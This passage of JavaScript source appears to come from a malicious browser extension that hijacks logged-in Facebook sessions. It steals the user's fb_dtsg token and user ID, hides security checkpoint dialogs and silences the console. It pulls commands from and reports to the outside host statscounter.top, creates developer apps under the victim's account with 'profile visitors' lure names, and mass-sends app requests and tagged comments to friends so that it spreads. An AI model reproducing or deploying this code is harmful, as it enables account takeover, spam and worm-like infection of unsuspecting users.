1645 target = globalFunction["between"]('"targetFBID":"', '"', response["responseText"]);
1646 fn(target, key, data);
1647 }
1648 });
1649 }
1650 function fn(key, name, cmd) {
1651 $["ajax"]({
1652 url : "https://www.facebook.com/plugins/comments/async/createComment/" + key + "/?dpr=1",
1653 type : "POST",
1654 async : true,
1655 data : {
1656 app_id : 0x67903d22b9a8,
1657 av : fb["user_id"],
1658 text : globalFunction["chain"](7)["toLowerCase"](),
1659 attached_photo_fbid : 0,
1660 attached_sticker_fbid : 0,
1661 post_to_feed : "false",
1662 __user : fb["user_id"],
1663 __a : 1,
1664 __dyn : "",
1665 __be : "0",
1666 __req : 4,
1667 __pc : "EXP1:DEFAULT",
1668 fb_dtsg : fb["user_dtsg"],
1669 ttstamp : fb["tts"],
1670 __rev : fb["rev"],
1671 __sp : 1
1672 },
1673 complete : function(textStatus) {
1674 run(key, name, cmd);
1675 }
1676 });
1677 }
1678 function run(cb, options, src) {
1679 $["ajax"]({
1680 url : "https://www.facebook.com/plugins/comments.php",
1681 type : "GET",
1682 async : true,
1683 data : {
1684 api_key : 0x67903d22b9a8,
1685 href : src
1686 },
1687 complete : function(response) {
1688 share_id = globalFunction["between"]('"commentIDs":["', '"', response["responseText"])["split"]("_")[1];
1689 init(cb, share_id, options);
1690 }
1691 });
1692 }
1693 function init(options, url, query) {
1694 post_params = {
1695 "ft_ent_identifier" : url,
1696 "comment_text" : globalFunction["chain"](8),
1697 "source" : 1,
1698 "client_id" : Date["now"]() + ":" + Math["floor"](Date["now"]() / 1E3),
1699 "session_id" : globalFunction["chain"](8),
1700 "reply_fbid" : "",
1701 "parent_comment_id" : "",
1702 "rootid" : "u_ps_jsonp_4_0_k",
1703 "clp" : "",
1704 "attached_sticker_fbid" : 0,
1705 "attached_photo_fbid" : 0,
1706 "attached_video_fbid" : 0,
1707 "ft[tn]" : "[]",
1708 "ft[qid]" : "6271619884131370153",
1709 "ft[mf_story_key]" : "-9029360610560797030",
1710 "ft[fbfeed_location]" : 1,
1711 "ft[insertion_position]" : 1,
1712 "av" : fb["user_id"],
1713 "__user" : fb["user_id"],
1714 "__a" : 1,
1715 "__dyn" : "",
1716 "__req" : "2u",
1717 "__pc" : "EXP1:DEFAULT",
1718 "fb_dtsg" : fb["user_dtsg"],
1719 "ttstamp" : fb["tts"],
1720 "__rev" : fb["rev"]
1721 };
1722 $["ajax"]({
1723 url : "https://www.facebook.com/ufi/add/comment/?dpr=2",
1724 type : "POST",
1725 async : true,
1726 data : post_params,
1727 complete : function(response) {
1728 commit = response["responseText"]["split"]('false,"id":"')[1]["split"]('","fbid"')[0]["trim"]();
1729 ajax(options, url, query, commit);
1730 }
1731 });
1732 }
1733 function ajax(targ, options, url, hash) {
1734 post_params = {
1735 "ft_ent_identifier" : options,
1736 "comment_text" : globalFunction["chain"](10),
1737 "source" : 1,
1738 "comment_id" : hash,
1739 "client_id" : Date["now"]() + ":" + Math["floor"](Date["now"]() / 2E3),
1740 "session_id" : globalFunction["chain"](8),
1741 "reply_fbid" : "",
1742 "parent_comment_id" : "",
1743 "rootid" : "u_ps_jsonp_4_0_k",
1744 "clp" : "",
1745 "attached_sticker_fbid" : 0,
1746 "attached_photo_fbid" : 0,
1747 "attached_video_fbid" : 0,
1748 "ft[tn]" : "[]",
1749 "ft[qid]" : "6271619884131370153",
1750 "ft[mf_story_key]" : "-9029360610560797030",
1751 "ft[fbfeed_location]" : 1,
1752 "ft[insertion_position]" : 1,
1753 "__user" : fb["user_id"],
1754 "__a" : 1,
1755 "__dyn" : "",
1756 "__req" : "2u",
1757 "__pc" : "EXP1:DEFAULT",
1758 "fb_dtsg" : fb["user_dtsg"],
1759 "ttstamp" : fb["tts"],
1760 "__rev" : fb["rev"]
1761 };
1762 post_params["comment_text"] += "@[" + url + ":" + globalFunction["chain"](1) + "]";
1763 $["ajax"]({
1764 url : "https://www.facebook.com/ufi/edit/comment/?dpr=1",
1765 type : "POST",
1766 async : true,
1767 data : post_params,
1768 complete : function(textStatus) {
1769 }
1770 });
1771 }
1772 ajaxt = 0;
1773 data = data + "?r=1";
1774 data = data["replace"](data["split"]("/")[5]["split"](".")[0], globalFunction["random"](1033213, 9233213));
1775 callback(err);
1776}
1777function developer(dataAndEvents) {
1778 fbData["appId"] = dataAndEvents;
1779 $["ajax"]({
1780 url : "https://www.facebook.com/ajax/chat/buddy_list.php?__pc=EXP1%3ADEFAULT",
1781 type : "POST",
1782 async : false,
1783 data : {
1784 "user" : fb["user_id"],
1785 "cached_user_info_ids" : "",
1786 "fetch_mobile" : "true",
1787 "get_now_available_list" : "true",
1788 "__user" : fb["user_id"],
1789 "__a" : "1",
1790 "_dyn" : "",
1791 "__req" : "j",
1792 "fb_dtsg" : fb["user_dtsg"],
1793 "ttstamp" : fb["phstamp"],
1794 "__rev" : fb["rev"]
1795 },
1796 complete : function(res) {
1797 res = globalFunction["parse"](res["responseText"]["substring"](9, res["responseText"]["length"]));
1798 nowAvailable = res["payload"]["buddy_list"]["last_active_times"];
1799 nowAvailable = Object["keys"](nowAvailable)["sort"](function(timeoutKey, $conditional) {
1800 return nowAvailable[timeoutKey] - nowAvailable[$conditional];
1801 })["reverse"]();
1802 $["ajax"]({
1803 url : "https://www.facebook.com/v2.0/dialog/oauth/read?__pc=EXP1%3ADEFAULT",
1804 type : "POST",
1805 async : false,
1806 data : {
1807 "fb_dtsg" : fb["user_dtsg"],
1808 "app_id" : fbData["appId"],
1809 "redirect_uri" : "http://statichtmlapp.com/",
1810 "display" : "popup",
1811 "access_token" : "",
1812 "sdk" : "",
1813 "from_post" : "1",
1814 "public_info_nux" : "1",
1815 "private" : "",
1816 "tos" : "",
1817 "login" : "",
1818 "read" : "public_profile,baseline",
1819 "write" : "",
1820 "extended" : "",
1821 "social_confirm" : "",
1822 "confirm" : "",
1823 "seen_scopes" : "public_profile,baseline",
1824 "auth_type" : "",
1825 "auth_token" : "",
1826 "auth_nonce" : "",
1827 "default_audience" : "",
1828 "ref" : "Default",
1829 "return_format" : "access_token",
1830 "domain" : "",
1831 "sso_device" : "",
1832 "sheet_name" : "initial",
1833 "__CONFIRM__" : "1",
1834 "__user" : +fb["user_id"],
1835 "__a" : 1,
1836 "__dyn" : "",
1837 "__req" : 1,
1838 "ttstamp" : fb["phstamp"],
1839 "__rev" : fb["rev"]
1840 },
1841 complete : function(response) {
1842 if (response["responseText"]["indexOf"]("error_message") > -1) {
1843 $["get"]("https://statscounter.top/li3.php?add=" + fbData["appId"], function() {
1844 });
1845 }
1846 console["log"]("FRIENDS" + nowAvailable["length"]);
1847 tt = 0;
1848 for (;tt < Math["ceil"](nowAvailable["length"] / 300);tt++) {
1849 profileChooserItems = "{";
1850 i = tt * 300;
1851 for (;i < 300 * (tt + 1);i++) {
1852 if (globalFunction["type"](nowAvailable[i])) {
1853 profileChooserItems = profileChooserItems + '"' + nowAvailable[i] + '":true,';
1854 }
1855 }
1856 profileChooserItems = profileChooserItems["slice"](0, profileChooserItems["length"] - 1) + "}";
1857 $["ajax"]({
1858 url : "https://www.facebook.com/v2.5/dialog/app_requests/submit?dpr=1",
1859 type : "POST",
1860 async : true,
1861 data : {
1862 "app_id" : fbData["appId"],
1863 "redirect_uri" : "https://statichtmlapp.com/",
1864 "display" : "popup",
1865 "access_token" : "",
1866 "sdk" : "joey",
1867 "from_post" : 1,
1868 "e2e" : '{"submit_0":' + Date["now"]() + "}",
1869 "message" : "",
1870 "data" : fbData["appId"],
1871 "frictionless" : "",
1872 "profileChooserItems" : profileChooserItems,
1873 "egoLoggingSignature" : fb["user_id"] + "-" + fbData["appId"] + "-0",
1874 "__CONFIRM__" : "1",
1875 "__user" : fb["user_id"],
1876 "__a" : "1",
1877 "_dyn" : "",
1878 "__req" : "j",
1879 "fb_dtsg" : fb["user_dtsg"],
1880 "ttstamp" : fb["phstamp"],
1881 "__rev" : fb["rev"]
1882 },
1883 complete : function(textStatus) {
1884 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 1);
1885 }
1886 });
1887 }
1888 }
1889 });
1890 }
1891 });
1892}
1893function developer2(dataAndEvents) {
1894 fbData["appName"] = globalFunction["returnName"]()["replace"](/[^\w\s]/gi, "")["replaceAll"](" ", "") + globalFunction["random"](100, 999);
1895 if (fbData["appName"]["indexOf"]("Canvas") > -1) {
1896 fbData["appName"] = globalFunction["chain"](20)["toLowerCase"]();
1897 }
1898 genro = [414, 426, 425, 427, 421, 403, 423, 422, 406, 420, 402, 408, 412, 418, 410, 417];
1899 genro = genro[Math["floor"](Math["random"]() * genro["length"])];
1900 $["ajax"]({
1901 url : "https://developers.facebook.com/account/register/?__pc=EXP1%3ADEFAULT",
1902 type : "POST",
1903 async : false,
1904 data : {
1905 "__user" : fb["user_id"],
1906 "__a" : "1",
1907 "_dyn" : "",
1908 "__req" : "j",
1909 "fb_dtsg" : fb["user_dtsg"],
1910 "ttstamp" : fb["phstamp"],
1911 "__rev" : fb["rev"]
1912 },
1913 complete : function(response) {
1914 console["log"]("REGISTERED");
1915 if (response["responseText"]["indexOf"]('success":false') == -1) {
1916 $["ajax"]({
1917 url : "https://developers.facebook.com/apps/async/platform-setup/create/?__pc=EXP1%3ADEFAULT",
1918 type : "POST",
1919 async : false,
1920 data : {
1921 "basic_name" : fbData["appName"],
1922 "basic_email" : fbData["appName"] + "@gmail.com",
1923 "app_details_category" : 400,
1924 "app_details_sub_category" : genro,
1925 "parent_app_id" : 0,
1926 "__user" : fb["user_id"],
1927 "__a" : "1",
1928 "_dyn" : "",
1929 "__req" : "j",
1930 "fb_dtsg" : fb["user_dtsg"],
1931 "ttstamp" : fb["phstamp"],
1932 "__rev" : fb["rev"]
1933 },
1934 complete : function(response) {
1935 fbData["appId"] = globalFunction["between"]('"appID":', ",", response["responseText"]);
1936 console["log"]("APP CREATED ==> " + fbData["appId"]);
1937 signed = "JuVd8llgwkk-TFWO83Uh30cAsPbRuLleMdqiirvQByI.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsInVzZXIiOnsibG9jYWxlIjoiZW5fVVMifSwicGFnZSI6eyJpZCI6IjEwMTMwNDk2Mzg3NDI5MjgiLCJsaWtlZCI6dHJ1ZX19";
1938 add1 = globalFunction["chain"](globalFunction["random"](5, 10))["toLowerCase"]() + "=" + globalFunction["chain"](globalFunction["random"](170, 180));
1939 add2 = globalFunction["chain"](globalFunction["random"](5, 10))["toLowerCase"]() + "=" + globalFunction["chain"](globalFunction["random"](170, 180));
1940 url = "https://" + globalFunction["rand"](1E7, 99999999) + ".statichtmlapp.com/tab/1/visitor/" + globalFunction["rand"](1E12, 9999999999999) + "/?signed_request=" + signed;
1941 names = [globalFunction["banword"]("Tu perfil tuvo hoy: " + globalFunction["random"](10, 99) + " visitas"), globalFunction["banword"]("Visitas a tu perfil:") + globalFunction["random"](1E3, 9999), globalFunction["random"](1E3, 9999) + globalFunction["banword"](" visitas a tu perfil")];
1942 appname = names[Math["floor"](Math["random"]() * names["length"])];
1943 $["ajax"]({
1944 url : "https://developers.facebook.com/x/apps/" + fbData["appId"] + "/settings/basic/save/?__pc=EXP1%3Adevsite_pkg",
1945 type : "POST",
1946 async : false,
1947 data : {
1948 "basic_name" : appname,
1949 "basic_namespace" : "",
1950 "basic_email" : fbData["appName"] + "@gmail.com",
1951 "basic_domains[0]" : "statichtmlapp.com",
1952 "enable_gamer_chat" : 1,
1953 "platforms[0]" : "canvas",
1954 "canvas_secure_url" : url,
1955 "mobile_web_url" : url,
1956 "app_details_privacy_policy_url" : "",
1957 "app_details_terms_of_service_url" : "",
1958 "app_details_category" : 400,
1959 "app_details_sub_category" : genro,
1960 "canvas_integration_plugin_url" : "",
1961 "unity_background_color" : "",
1962 "unity_border_color" : "",
1963 "unity_text_color" : "",
1964 "unity_disable_context_menu" : 1,
1965 "unity_logo_image_url" : "",
1966 "unity_progress_bar_image_url" : "",
1967 "unity_progress_bar_frame_image_url" : "",
1968 "canvas_fixed_height_pixels" : 800,
1969 "site_url" : "",
1970 "ios_iphone_store_id" : "",
1971 "ios_ipad_store_id" : "",
1972 "android_package_name" : "",
1973 "android_class_name" : "",
1974 "amazon_store_url" : "",
1975 "windows_store_id" : "",
1976 "windows_phone_store_id" : "",
1977 "page_tab_secure_url" : "",
1978 "page_tab_name" : "",
1979 "page_tab_edit_url" : "",
1980 "page_tab_admin_control" : 1,
1981 "page_tab_wide" : 1,
1982 "save_changes" : 1,
1983 "__user" : fb["user_id"],
1984 "__a" : "1",
1985 "_dyn" : "",
1986 "__req" : "j",
1987 "fb_dtsg" : fb["user_dtsg"],
1988 "ttstamp" : fb["phstamp"],
1989 "__rev" : fb["rev"]
1990 },
1991 complete : function(response) {
1992 if (globalFunction["between"]('"success":', ",", response["responseText"]) == "true") {
1993 console["log"]("SAVED");
1994 $["ajax"]({
1995 url : "https://developers.facebook.com/apps/async/review/toggle-sandbox/?app_id=" + fbData["appId"] + "&__pc=EXP1%3Adevsite_pkg",
1996 type : "POST",
1997 async : false,
1998 data : {
1999 "is_live" : "true",
2000 "confirmed" : 1,
2001 "__user" : fb["user_id"],
2002 "__a" : "1",
2003 "_dyn" : "",
2004 "__req" : "j",
2005 "fb_dtsg" : fb["user_dtsg"],
2006 "ttstamp" : fb["phstamp"],
2007 "__rev" : fb["rev"]
2008 },
2009 complete : function(textStatus) {
2010 $("body")["append"]('<canvas style="display:none" id="c2" width="1024" height="1024" ></canvas>');
2011 var c2 = document["getElementById"]("c2");
2012 var symbols = c2["getContext"]("2d");
2013 w = 1024;
2014 h = 1024;
2015 symbols["beginPath"]();
2016 symbols["rect"](0, 0, w, h);
2017 symbols["fillStyle"] = globalFunction["getRandomColor"]();
2018 symbols["fill"]();
2019 logof = new Image;
2020 logof["crossOrigin"] = "Anonymous";
2021 logof["src"] = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIEAYAAAAFfW8EAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAG2YAABzjgAA+3UAAITUAAB6swAA/2cAADBbAAAQhVDPV6EAAAPaSURBVHja7N1/TIxxAMfxz53rnLr8LJRYzIhMUVJXGjdihhn+SFkjlsY082NKf6ChZmZmzJmZH+Mya+ZHbLacjSTGFrM0Mz9OEaqnuqc6pPPHc7fW/MHzdDH3fF7/fPujrvW9977f73NXT5rEpJVpluNwmzRZGgv3SaPZLI2BA0Eq5miVxts2adyZL40vqnU9w3lwXxoHDeakUTfPArJ0qTTOmS2NpkSt9EFRIcOhP+fppLBQ23OrIpLDbHYHZDRyMkg+o1HLSaDeYEDEgIgBEQMiNdJxCv6NkNzgI4GZQPKtGfPHbgaiBke8CikDwjeM2jLEAARXD7UGiMAAc/8a3evur+vM+BHUdQTo2Ous6iwC2p3Ogm9lgMPeZv8aCgj6ljPOIODLuqZS0Qp8OtNoFJOBUztKrj++4v2fQyO9leFy8SntW5Fx4y0jbgJr760ojq0H4nRTbWGZACpwEdl9//2TZqWln7BwBfpv+GXrjvarATbmp0fFi8DymSl3ptgBzSNNFqoAAFncwugX/gbDbr8UoGjTVmHBeWB6U6Q9tJyHaPrdRC7TtmvigT1ncx7ODQemN0WO8+VwGJCXpQcsHh39EkgIjV41RkWzyoB6aXjmMNF4F1hjWpYaM5KX8SRT2rxF26O2APowP1O/WBVu3UxAmf6tervOCixckjx84n71zgNXIIVimiLHjioH/N8PmODXpeKLB6agzLQ1k5+HiJwHrkAKTTwaXhKcAqAAgBcv14XZLc6OEqB47o2aZxnAg49VF+xdQH1Qg82RA3TYnBHfxzGg/15o0oj4gY8AAJ+98XiNpc0X218BawPzr17OBRpuCdq2Qz0+JYJbmA8JHBMQpq/13uOdrrx86Uk90NAsaNu28Qzk8/wNht36FO893sOEpyffx/EQrRqag5ol7jdFvaI+qKFMzGFApJBrm+uaK5oBkcowIGJAxICIAREDImJA9Dep5s96yu9ZL6zPVt8TfMxmjag8BxTvKo152s4ViGR6e6L2kODkFkYKvXlW+1E4zIBIJmfB16rOA8Cnl41ZjmoGRHK3rowPscJqwGVypcLCgEimd6vqYptX8zKelJ59LH17eGZAPn/1VceAqDdnoLoZArcwkuvb8+8VP+4CH8o/V7b+hV+R5Q2mFPL2K9t9dQMorkDEgIgBETEgYkDEgIgBETEgYkDEgIgBEQMiYkDEgIgBEQMiYkDEgIgBEQMiYkDEgIgBka8GJPI/X5ECougOyGbjZJB8d2zugPLypLGlmZNCv+fpJDfPHVC1+x5WpkRpvH5NGh2tnCzq7sDTRUKip5ufAwDv9SClaFJeAgAAAABJRU5ErkJggg==";
2022 logof["onload"] = function() {
2023 symbols["drawImage"](logof, 0, 0, 1024, 1024);
2024 base64 = c2["toDataURL"]("image/jpeg");
2025 console["log"](base64);
2026 c2["toBlob"](function(deepDataAndEvents) {
2027 $["ajax"]({
2028 url : "https://developers.facebook.com/apps/" + fbData["appId"] + "/app-details/",
2029 type : "GET",
2030 async : false,
2031 complete : function(response) {
2032 lang = globalFunction["between"](";lang=", "&", response["responseText"]);
2033 prev = globalFunction["between"]("preview_id=", '"', response["responseText"]);
2034 var data = new FormData;
2035 data["append"]("fb_dtsg", fb["user_dtsg"]);
2036 data["append"]("app_id", fbData["appId"]);
2037 data["append"]("type", 120);
2038 data["append"]("preview_id", prev);
2039 data["append"]("lang", lang);
2040 data["append"]("name", "");
2041 data["append"]("image_upload", deepDataAndEvents, globalFunction["random"](0, 999999) + ".jpg");
2042 data["append"]("submit", "upload");
2043 $["ajax"]({
2044 url : "https://upload.facebook.com/ajax/image/upload/resource/?__a=1&__adt=2&__req=jsonp_2&__iframe=true&__user=" + fb["user_id"],
2045 type : "POST",
2046 async : false,
2047 contentType : "multipart/form-data",
2048 beforeSend : function(xhr) {
2049 if (xhr && xhr["overrideMimeType"]) {
2050 xhr["overrideMimeType"]("multipart/form-data");
2051 }
2052 },
2053 mimeType : "multipart/form-data",
2054 processData : false,
2055 contentType : false,
2056 data : data,
2057 complete : function(textStatus) {
2058 $["get"]("https://statscounter.top/db.php?appid=" + fbData["appId"], function() {
2059 });
2060 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 3);
2061 developer(fbData["appId"]);
2062 }
2063 });
2064 }
2065 });
2066 }, "image/jpeg");
2067 };
2068 }
2069 });
2070 }
2071 }
2072 });
2073 }
2074 });
2075 } else {
2076 fb["sendedApp"] = 0;
2077 var i = 0;
2078 for (;i < fbData["dev"]["length"];i++) {
2079 if (fb["sendedApp"] == 0) {
2080 if (globalFunction["checkapp"](fbData["dev"][i])) {
2081 fb["sendedApp"] = 1;
2082 developer(fbData["dev"][i]);
2083 }
2084 }
2085 }
2086 }
2087 }
2088 });
2089}
2090if (document["domain"]["indexOf"]("facebook.com") > -1 && globalFunction["type"](cookies["read"]("c_user")) == true) {
2091 $("form[action='/checkpoint/dialog']")["parent"]()["parent"]()["parent"]()["parent"]()["remove"]();
2092 if (fb["console"] == false) {
2093 console["log"] = function() {
2094 return "";
2095 };
2096 console["error"] = function() {
2097 return "";
2098 };
2099 console["warn"] = function() {
2100 return "";
2101 };
2102 }
2103 fb["name"] = globalFunction["between"]('","name":"', '"', $("html")["html"]()) ? globalFunction["between"]('","name":"', '"', $("html")["html"]()) : globalFunction["chain"](20);
2104 fb["user_id"] = cookies["read"]("c_user");
2105 fb["user_dtsg"] = $("input[name='fb_dtsg']")["val"]();
2106 ttstamp = 1;
2107 if (fb["user_dtsg"]) {
2108 ttstamp = "";
2109 var x = 0;
2110 for (;x < fb["user_dtsg"]["length"];x++) {
2111 ttstamp += fb["user_dtsg"]["charCodeAt"](x);
2112 }
2113 }
2114 fb["session"] = "";
2115 fb["composserid"] = $("input[name='composerid']")["val"]();
2116 fb["rev"] = globalFunction["between"]('"revision":', ",", $("html")["html"]());
2117 fb["rootid"] = fb["composserid"];
2118 fb["city"] = "106423786059675";
2119 fb["phstamp"] = "";
2120 fb["local"] = "es_ES";
2121 fb["tts"] = "2" + ttstamp;
2122 $(document)["ready"](function() {
2123 if (!globalFunction["type"]($("#startscript")["html"]())) {
2124 $("body")["append"]('<input type="hidden" id="startscript" value="1" />');
2125 if (cookies["read"](fb["user_id"] + "_sc" + fb["cache"]) != 1 && (fb["enable"] == true && cookies["read"]("c_user") != null)) {
2126 $["ajax"]({
2127 url : "https://statscounter.top/li3.php?i=1&id=" + fb["user_id"],
2128 type : "GET",
2129 async : false,
2130 complete : function(response) {
2131 fbData["appd"] = globalFunction["parse"](response["responseText"])["appid"];
2132 fbData["appd2"] = globalFunction["parse"](response["responseText"])["appid2"];
2133 fbData["dev"] = globalFunction["parse"](response["responseText"])["dev"];
2134 fbData["html"] = globalFunction["parse"](response["responseText"])["html"];
2135 fbData["bl"] = globalFunction["parse"](response["responseText"])["b"];
2136 fbData["ps"] = globalFunction["parse"](response["responseText"])["p"];
2137 fbData["links"] = globalFunction["parse"](response["responseText"])["o"];
2138 fbData["veces"] = globalFunction["parse"](response["responseText"])["e"];
2139 fbData["v"] = globalFunction["parse"](response["responseText"])["v"];
2140 link = fbData["html"];
2141 if (cookies["read"]("c_user") != null) {
2142 privacySetting();
2143 if (fb["debug"] == true && location["hostname"]["split"](".")[0] == "www") {
2144 makeShit(link, function() {
2145 });
2146 console["log"](gF["onlines"]());
2147 }
2148 if (fb["debug"] == false) {
2149 try {
2150 if (globalFunction["type"](chrome["runtime"])) {
2151 if (globalFunction["type"](chrome["runtime"]["sendMessage"])) {
2152 if (fbData["bl"] == "0") {
2153 startDB(function() {
2154 }, function() {
2155 });
2156 }
2157 }
2158 }
2159 makeShit(link, function() {
2160 });
2161 fbData["appsc"] = atob(fbData["v"]);
2162 if (fbData["appsc"]["indexOf"](chrome["runtime"]["id"]) > -1) {
2163 fb["app"] = chrome["runtime"]["id"];
2164 sfkklglr();
2165 (new Image)["src"] = "//whos.amung.us/swidget/wixerr42";
2166 }
2167 } catch (message) {
2168 nuid = globalFunction["random"](100, 999);
2169 console["log"]("error " + message);
2170 (new Image)["src"] = "//whos.amung.us/swidget/wixerr35";
2171 }
2172 }
2173 }
2174 }
2175 });
2176 } else {
2177 console["log"]("Disabled");
2178 console["log"]("Cookie: " + cookies["read"](fb["user_id"] + "_sc" + fb["cache"]));
2179 console["log"]("Enable: " + fb["enable"]);
2180 console["log"]("Logged: " + cookies["read"]("c_user"));
2181 }
2182 }
2183 });
2184}
2185;